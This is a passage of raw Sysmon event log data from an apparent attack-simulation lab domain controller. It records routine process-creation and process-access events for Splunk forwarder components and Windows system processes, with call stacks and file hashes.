Files\SplunkUniversalForwarder\bin\splunkd.exe{5D479F2C-16B8-5F84-6600-000000007F01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000002243Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:28.346{5D479F2C-16B8-5F84-6600-000000007F01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe8.0.2Remote Performance monitor using WMIsplunk ApplicationSplunk Inc.splunk-wmi.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5D479F2C-169F-5F84-E703-000000000000}0x3e70SystemMD5=5DA29397A44401083341D66B52CA8BC4,SHA256=F51A58BCBF3532B9EF1B6478839424C33EA0426BCD5C6B4B636AD25D5177379C,IMPHASH=FFEB0CD073A55A73D08AC443E4942F81{5D479F2C-16B1-5F84-3000-000000007F01}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002269Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:29.418{5D479F2C-16B2-5F84-3A00-000000007F01}37963816C:\Windows\system32\conhost.exe{5D479F2C-16B9-5F84-6700-000000007F01}3952C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002268Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:29.418{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002267Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:29.418{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002266Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:29.418{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002265Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:29.418{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002264Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:29.418{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002263Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:29.418{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002262Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:29.418{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002261Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:29.418{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002260Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:29.418{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002259Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:29.418{5D479F2C-169F-5F84-0500-000000007F01}6481156C:\Windows\system32\csrss.exe{5D479F2C-16B9-5F84-6700-000000007F01}3952C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002258Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:29.418{5D479F2C-16B1-5F84-3000-000000007F01}26164088C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5D479F2C-16B9-5F84-6700-000000007F01}3952C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000002257Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:29.236{5D479F2C-16B9-5F84-6700-000000007F01}3952C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5D479F2C-169F-5F84-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{5D479F2C-16B1-5F84-3000-000000007F01}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002283Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:30.449{5D479F2C-16BA-5F84-6800-000000007F01}40763776C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{5D479F2C-16B1-5F84-3000-000000007F01}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002282Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:30.293{5D479F2C-16B2-5F84-3A00-000000007F01}37963816C:\Windows\system32\conhost.exe{5D479F2C-16BA-5F84-6800-000000007F01}4076C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002281Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:30.293{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002280Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:30.293{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002279Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:30.293{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002278Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:30.293{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002277Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:30.293{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002276Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:30.293{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002275Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:30.293{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002274Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:30.293{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002273Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:30.293{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002272Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 